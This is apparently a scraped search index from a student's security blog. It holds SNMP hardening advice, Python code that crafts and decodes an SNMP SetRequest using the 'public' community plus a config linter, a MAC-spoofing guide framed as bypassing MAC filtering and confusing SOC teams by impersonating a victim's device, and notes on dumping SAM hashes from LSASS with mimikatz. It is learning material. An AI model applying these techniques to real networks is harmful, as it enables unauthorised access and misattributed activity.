This makes it impossible for an attacker to \u0026ldquo;sniff\u0026rdquo; the credentials or send an unauthorized SET request. Use Strong, Complex Community Strings: If you are absolutely forced to use SNMPv2c, treat the community string like a complex password. Never use \u0026ldquo;public,\u0026rdquo; \u0026ldquo;private,\u0026rdquo; or other guessable words. Use IP Access Control: This is a critical layer of defense. In the Windows SNMP service \u0026ldquo;Security\u0026rdquo; tab, always configure it to \u0026ldquo;Accept SNMP packets from these hosts.\u0026rdquo; Only add the specific IP addresses of your trusted monitoring servers. This blocks requests from an attacker\u0026rsquo;s machine, even if they guess the community string. Audit Your Network: Regularly run Nmap scripts or other vulnerability scanners from a security-testing machine (like Kali) to find any devices you\u0026rsquo;ve missed that are still responding to weak community strings. SNMP best practices: Tier 1: The Best-Practice Solution (Use SNMPv3) The single most important thing you can do is stop using SNMPv1 and v2c. Their community strings are sent in clear text (like a plaintext password) and are trivial to capture.\nUpgrading to SNMPv3 is the correct modern solution. It replaces community strings with a User-based Security Model (USM) that provides:\nAuthentication: Verifies the sender is who they say they are (using MD5 or SHA). Privacy (Encryption): Encrypts the data in transit (using DES or AES). Practical Steps: Disable SNMPv1/v2c on your device (router, switch, server). Enable SNMPv3. Create a User with a strong, unique username. Set an Authentication Password using a strong algorithm (SHA is preferred over MD5). Set a Privacy Password using a strong algorithm (AES is preferred over DES). Configure your monitoring system to use these new SNMPv3 credentials. 
This authPriv (authentication + privacy) security level is the one to standardise on.\nTier 2: Hardening SNMPv1/v2c (If You Can't Upgrade) If you have legacy devices that only support v1 or v2c, apply all of the following.\n1. Change Default Community Strings This is non-negotiable. Never use the default strings.\nDefault read-only: public Default read-write: private Practical Step: change these to long, randomly generated strings and protect them like a root password. They still travel in clear text, so anyone able to capture traffic to the agent learns them regardless, which is why steps 2 and 3 matter. 2. Implement Access Control Lists (ACLs) This is the most effective protection for v1/v2c. An ACL acts as a firewall so that only your monitoring server can send SNMP requests to the device.\nPractical Step:\nIdentify the IP address of your trusted Network Management Station (NMS), for example 10.1.1.100. Create an access list on the device (router, switch or server firewall) that permits UDP port 161 from 10.1.1.100 and denies it from every other address. 3. Enforce Read-Only Access Never grant read-write access unless a specific, temporary administrative task needs it. An attacker with read-write access can change the device's configuration, shut down interfaces and cause a denial of service.\nPractical Step: make sure the community string is configured with read-only rights.\nOn Windows: in SNMP Service properties, Security tab, select the community string and confirm its rights are READ ONLY. On Linux (net-snmp): in /etc/snmp/snmpd.conf use rocommunity rather than rwcommunity; the same directive accepts a source address as its second argument, which enforces the ACL from step 2 on the agent itself. Tier 3: The Easiest and Safest Step If you do not use SNMP for monitoring, do not leave it running.\nPractical Step: Disable the Service On Windows Server: open services.msc, find SNMP Service, stop it and set its Startup type to Disabled. 
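Worked example (added here; it is not part of the original notes or of any tool they use): a minimal BER encoder/decoder for SNMPv1/v2c that builds the same SetRequest the snmpset command above sends and then decodes it the way anyone sniffing the segment would. The request id, the hostless UDP payload and the value "Test Contact" are constructed for the demonstration. The point it makes concrete: the community string is an unencrypted OCTET STRING in every datagram, so capturing a single packet is enough to reuse it.

```python
"""Minimal BER encoder/decoder for SNMPv1/v2c.

Added example, not from the original notes: builds the SetRequest the snmpset
command above sends and decodes it the way an on-path sniffer would. Request
id 0x1234 is arbitrary; community and value match the walkthrough.
"""
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
GET_REQUEST, SET_REQUEST = 0xA0, 0xA3
SNMP_V1, SNMP_V2C = 0, 1            # wire values of the version field (v3 is 3)
SYS_CONTACT = "1.3.6.1.2.1.1.4.0"   # sysContact.0, the OID written in the notes

def _length(n: int) -> bytes:
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _length(len(payload)) + payload

def enc_int(value: int) -> bytes:
    """INTEGER, minimal two's complement (+8 bits guarantees room for the sign)."""
    return tlv(INTEGER, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def enc_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs as 40*a+b, remaining arcs base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                       # prepend continuation groups, high bit set
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return tlv(OID, bytes(out))

def build_message(version: int, community: str, pdu_type: int, request_id: int, varbinds) -> bytes:
    """Message = SEQUENCE { version, community, PDU { id, error-status, error-index, varbinds } }."""
    vbl = b"".join(tlv(SEQUENCE, enc_oid(oid) + value) for oid, value in varbinds)
    pdu = tlv(pdu_type, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(SEQUENCE, vbl))
    return tlv(SEQUENCE, enc_int(version) + tlv(OCTET_STRING, community.encode()) + pdu)

def _read_tlv(buf: bytes, pos: int):
    """Return (tag, contents, offset just past this element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                    # long form: low 7 bits give the byte count
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length

def dec_int(b: bytes) -> int:
    return int.from_bytes(b, "big", signed=True)

def dec_oid(b: bytes) -> str:
    arcs, acc = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:
        acc = (acc << 7) | (byte & 0x7F)
        if not byte & 0x80:              # high bit clear ends the arc
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def parse_message(pkt: bytes) -> dict:
    """Decode a v1/v2c datagram; no key is needed, which is the whole problem."""
    tag, body, _ = _read_tlv(pkt, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, pdu, _ = _read_tlv(body, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, _status, pos = _read_tlv(pdu, pos)
    _, _index, pos = _read_tlv(pdu, pos)
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, q = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, q)
        if vtag == OCTET_STRING:
            value = val.decode(errors="replace")
        elif vtag == INTEGER:
            value = dec_int(val)
        else:
            value = None if vtag == NULL else val.hex()
        varbinds.append((dec_oid(oid), value))
    return {"version": dec_int(ver), "community": community.decode(errors="replace"),
            "pdu_type": PDU_TYPES.get(pdu_tag, hex(pdu_tag)), "request_id": dec_int(rid),
            "varbinds": varbinds}

def snmpset_equivalent() -> bytes:
    """UDP payload equivalent to: snmpset -v2c -c public HOST 1.3.6.1.2.1.1.4.0 s "Test Contact"."""
    return build_message(SNMP_V2C, "public", SET_REQUEST, 0x1234,
                         [(SYS_CONTACT, tlv(OCTET_STRING, b"Test Contact"))])
```

Print snmpset_equivalent().hex() and the bytes 7075626c6963 ("public") sit in the datagram as plain ASCII, right after the version field; parse_message recovers community, PDU type and the sysContact value without any key. A GetRequest built with build_message(SNMP_V1, ..., GET_REQUEST, ..., [(SYS_CONTACT, tlv(NULL, b""))]) decodes the same way. That absence of any key is exactly what SNMPv3's USM changes.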
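Second worked example (also added, not from the notes or from the net-snmp project): a small lint for /etc/snmp/snmpd.conf that flags the Tier 1 and Tier 2 points, run over three constructed configurations: the weak agent the walkthrough abuses, a v2c agent hardened as in Tier 2 (random string, read-only, restricted to the NMS 10.1.1.100 from the text) and an SNMPv3-only agent. It assumes net-snmp's directive syntax (rocommunity/rwcommunity, createUser, rouser/rwuser); the passphrases are placeholders, not real secrets.

```python
"""Lint an snmpd.conf for the weaknesses discussed above (added example, not
from the original notes or from net-snmp). The three configurations are
constructed: WEAK_CONF is the kind of agent the walkthrough abuses, LEGACY_CONF
is v2c hardened as in Tier 2, V3_CONF is the Tier 1 target. Passphrases are
placeholders, not real secrets."""
import shlex
from dataclasses import dataclass

WEAK_CONF = """\
rocommunity public
rwcommunity private
syslocation Lab
"""
# Tier 2: random string, read-only, and a source address (net-snmp's built-in
# ACL); 10.1.1.100 is the trusted NMS from the text.
LEGACY_CONF = """\
rocommunity Kq7vR2pX9mZ4tW8bN3cL6hJ1 10.1.1.100
"""
# Tier 1: no community lines (so v1/v2c requests are refused), one v3 user with
# SHA + AES, and level 'priv' so weaker security levels are rejected.
V3_CONF = """\
createUser monitor SHA "auth-passphrase-placeholder-change-me" AES "priv-passphrase-placeholder-change-me"
rouser monitor priv
agentAddress udp:161
"""
DEFAULT_COMMUNITIES = {"public", "private"}
SEVERITY_ORDER = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}

@dataclass(frozen=True)
class Finding:
    severity: str
    line: int
    message: str

def lint_snmpd_conf(text: str) -> list:
    """Return findings sorted by severity then line; empty means nothing flagged."""
    findings = []

    def add(severity, lineno, message):
        findings.append(Finding(severity, lineno, message))

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)              # keeps quoted passphrases as one token
        directive, args = tokens[0].lower(), tokens[1:]
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"):
            community = args[0] if args else ""
            source = args[1] if len(args) > 1 else "default"   # default = any address
            if directive.startswith("rw"):
                add("HIGH", lineno, f"read-write community '{community}': a guessed string allows SET on writable OIDs")
            if community.lower() in DEFAULT_COMMUNITIES:
                add("HIGH", lineno, f"default community string '{community}'")
            if source == "default":
                add("MEDIUM", lineno, f"community '{community}' accepted from any source; restrict it to the NMS")
            add("LOW", lineno, "SNMPv1/v2c enabled: the community string crosses the network in clear text")
        elif directive == "createuser":
            # createUser [-e ENGINEID] USER (MD5|SHA|SHA-256...) AUTHPASS [DES|AES] [PRIVPASS]
            a = args[2:] if args[:1] == ["-e"] else args
            user = a[0] if a else "?"
            auth = a[1].upper() if len(a) > 1 else None
            priv = a[3].upper() if len(a) > 3 else None
            if auth == "MD5":
                add("MEDIUM", lineno, f"v3 user '{user}' authenticates with MD5; use SHA")
            if priv is None:
                add("HIGH", lineno, f"v3 user '{user}' has no privacy protocol; payloads go out unencrypted")
            elif priv == "DES":
                add("MEDIUM", lineno, f"v3 user '{user}' encrypts with DES; use AES")
        elif directive in ("rouser", "rwuser"):
            # rouser [-s MODEL] USER [noauth|auth|priv]; net-snmp defaults the level to auth
            a = args[2:] if args[:1] == ["-s"] else args
            user = a[0] if a else "?"
            level = a[1].lower() if len(a) > 1 else "auth"
            if level != "priv":
                add("HIGH" if level == "noauth" else "MEDIUM", lineno,
                    f"v3 user '{user}' allowed at level '{level}'; require priv (authPriv)")
            if directive == "rwuser":
                add("MEDIUM", lineno, f"v3 user '{user}' has write access; prefer rouser")
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.line))

def worst(text: str) -> str:
    """One-word verdict for the audit loop described in the text: HIGH, MEDIUM, LOW or OK."""
    findings = lint_snmpd_conf(text)
    return findings[0].severity if findings else "OK"
```

worst(WEAK_CONF) is HIGH, worst(LEGACY_CONF) is LOW (the only remaining issue is that v2c itself is clear text) and worst(V3_CONF) is OK. The lint reads the file, not the running agent, so it complements rather than replaces the snmp-brute sweep from the audit step. Note also that net-snmp's documentation places createUser in the persistent snmpd.conf under /var/lib, where the daemon hashes the passphrases and removes the clear-text line on start-up; the lint does not check where the line lives.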
On Linux (systemd): # Stop the service now sudo systemctl stop snmpd # Prevent it from starting on boot sudo systemctl disable snmpd ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/11-snmp-exploitation/","title":"SNMP Exploitation"},{"content":"Requirements: Install TMAC (Technitium MAC Address Changer) and Angry IP Scanner. Practical demo: 1. Open Angry IP Scanner. In a command prompt run ipconfig to see your own IP address and getmac to see your own MAC address. 2. In Angry IP Scanner set the scan range to match your own subnet. 3. Click the IP column header and, in the fetcher list that opens, double-click MAC address on the right so it moves to the left and is collected during the scan. 4. Start the scan. 5. Pick one discovered MAC address and enter it in TMAC to set it on your own interface. 6. Compare your MAC address before and after. Internet access drops for a few seconds because the network interface is restarted when the MAC address changes. Carrying the MAC of an already-authorised client, your machine passes MAC-based filtering or a captive portal that whitelisted that client without its owner's login credentials, and any traffic you then generate is attributed to the victim's hardware address, which is what makes the technique useful for confusing the SOC team during an engagement. Tracert: tracing internet route Trace the route your traffic takes with the command tracert followed by a hostname or IP address. SAM file location: C:\\Windows\\System32\\config\\\nWhat is SAM? SAM: Security Accounts Manager Database The Security Accounts Manager (SAM) database is a core component of Microsoft Windows. It stores local account information and the password hashes used to authenticate users to the local system. 
The hashes are LAN Manager (LM) and/or NT (NTLM) hashes, depending on the password-storage policy in force (LM storage is disabled by default on current Windows versions). While Windows is running, the SAM hive is held open exclusively by the kernel, so it cannot be read or copied with an ordinary file copy. It lives at %systemroot%\\system32\\config\\SAM, with a backup copy at %systemroot%\\repair\\sam._ on older Windows versions. The SAM database is central to local authentication and access control: a local logon is checked against it.\nBecause the hive on disk is locked, attackers go after the copies in memory instead. Tools such as mimikatz read the address space of LSASS (Local Security Authority Subsystem Service), and older pwdump-style tools inject a DLL into LSASS for the same purpose; both require local administrator rights (SeDebugPrivilege). ","permalink":"https://0x-s0M3n4th.github.io/notes/miscellaneous/int-244/mac-address-spoofing/","title":"Practical Guide: MAC Address Spoofing"},{"content":" About Me I am a 3rd-year student at Lovely Professional University and, yes, a normal person just like you. My core focus is on Infrastructure Security, Adversary Emulation, Administering different tasks, and Blue Team operations. 
Unlike typical red teamers, I believe in mastering the defensive side first—diving deep into Linux \u0026amp; Windows System Administration to understand exactly what I am attacking or protecting.\nI prefer a hands-on, research-driven approach, utilizing extensive home labs to simulate Phishing Campaigns, set up basic C2 Operations, and practice Blue Team monitoring. Currently, I am also refining my low-level programming skills in C to better understand operating system internals.\nSkills \u0026amp; Technologies System Administration Linux: Deep knowledge of permissions, process management, Bash scripting, and service configuration. Windows: Active Directory (AD) deployment, GPO management, PowerShell automation, and domain hardening. Security Operations Red Teaming: Phishing Campaign Development, Basic C2 Infrastructure (setup \u0026amp; connectivity), Active Directory Exploitation. Blue Teaming: Log Analysis, SIEM fundamentals, Windows Forensics, Linux Forensics, and System Hardening. Languages \u0026amp; Tools Languages: Python (Automation), C (Low-level dev), Bash, PowerShell. Tools: Metasploit, Burp Suite, Wireshark, Sysinternals, PowerShell Empire, Shellter, Evilginx2, GoPhish, BloodHound, Mimikatz, Responder, NetExec, ffuf, proxychains, Suricata, Wazuh Projects 1. Enterprise Home Lab \u0026amp; Adversary Emulation The core of my practical learning.\nInfrastructure: Deployed a complete Active Directory environment with Domain Controllers, Workstations, and Linux servers. Red Operations: Executed simulated Phishing campaigns and deployed basic C2 agents to test network defenses and persistence. Blue Operations: Monitored traffic and system logs to detect the artifacts generated by my own attacks, bridging the gap between Red and Blue teaming. 2. Build Your Own Shell (C Language) Part of the CodeCrafters Challenge\nDeveloping a POSIX-compliant shell in C. 
Implementing core system interactions, process creation, and signal handling to understand Linux internals at a deeper level. 3. Remote Control (RC) Car Designed and assembled a custom RC car, handling component selection, circuit assembly, and motor control logic. Key components used: Arduino Uno, L298N Motor Driver, DC Gear Motors, HC-05 Bluetooth Module, Li-ion Batteries. 4. Cybersecurity Blog \u0026amp; Knowledge Base Built and maintained this site using Hugo \u0026amp; PaperMod. Documenting System Administration guides, penetration testing methodologies, Blue Team Operations and lab configurations. Certifications \u0026amp; Courses eJPT (eLearnSecurity Junior Penetration Tester) - INE Security RH-124 - Red Hat Academy RH-134 - Red Hat Academy PNPT coursework (Practical Network Penetration Tester) - TCM Security Practical Help Desk - TCM Security Experience Cybersecurity Student / Researcher Self-Employed / Academic | 2025 - Present\nEnterprise System Administration: Designed and administered a hybrid Linux/Windows environment mimicking corporate scale. Configured core services (AD DS, DNS, DHCP), enforced network isolation via VLANs, and utilized Python \u0026amp; Bash to automate configuration management and system hardening. Network Penetration Testing: Conducted end-to-end assessments to validate security postures, utilizing simulated phishing campaigns via Azure for initial access and deploying basic C2 infrastructure to test network persistence. Successfully executed complex exploit chains targeting Active Directory misconfigurations and lateral movement paths. Security Infrastructure Implementation: Deployed and integrated a centralized security monitoring stack (Wazuh, Suricata, Zeek) to audit system logs and network traffic, ensuring comprehensive visibility and verifying the detection of specific attack signatures. CTFs Active participant in CTF events (HackTheBox, PicoCTF). 
Focused on realistic network scenarios, privilege escalation, and lateral movement challenges. Contact Email: sebaitsom6297@gmail.com Socials: LinkedIn / Twitter / GitHub Resume Download My Resume (PDF)\n","permalink":"https://0x-s0M3n4th.github.io/portfolio/","summary":"System Administration, Blue Teaming, and Red Team Operations.","title":"Portfolio"},{"content":"Table of Contents Blogs My First Blog Blog 1 Notes Practical Wireshark Practical Snort Practical Wazuh ","permalink":"https://0x-s0M3n4th.github.io/table-of-contents/","summary":"\u003ch2 id=\"table-of-contents\"\u003eTable of Contents\u003c/h2\u003e\n\u003ch3 id=\"blogs\"\u003eBlogs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"/blogs/welcome/\"\u003eMy First Blog\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/blogs/blog_1/\"\u003eBlog 1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"notes\"\u003eNotes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/00-wireshark/intro-to-wireshark/\"\u003ePractical Wireshark\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/01-snort/intrusion-detection-with-snort/\"\u003ePractical Snort\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/02-wazuh/00-introduction-\u0026#43;-installation/\"\u003ePractical Wazuh\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"Table of Contents"}]